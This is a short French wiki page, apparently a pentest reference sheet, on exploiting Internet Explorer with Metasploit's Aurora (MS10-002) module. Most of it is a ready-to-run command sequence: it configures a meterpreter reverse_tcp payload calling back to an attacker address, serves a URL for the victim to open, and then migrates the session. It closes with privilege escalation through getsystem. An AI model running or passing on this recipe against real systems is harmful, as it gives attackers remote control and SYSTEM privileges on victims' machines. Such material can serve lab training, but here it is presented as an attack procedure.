Aurora
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation navigateur (Internet Explorer) |
| Module | windows/browser/ms10_002_aurora
|
| Contexte | Metasploit |
| Voir aussi | Browser autopwn · Meterpreter |
L'exploit Aurora (MS10-002) cible Internet Explorer. Le principe : envoyer une URL à la cible ; à son ouverture, Metasploit utilise le heap spray pour exploiter une corruption mémoire et injecter un meterpreter.
Mise en place
use windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
set SRVPORT 80
set URIPATH /
set LHOST 192.168.0.12
set LPORT 443
exploit
La cible doit ouvrir l'URL servie :
# http://192.168.0.12:80
Une fois la session ouverte, migrer vers un processus plus stable :
sessions -i 1
run migrate
# ou, en automatique :
show advanced
set AutoRunScript migrate -f
Escalade de privilèges
use priv
getsystem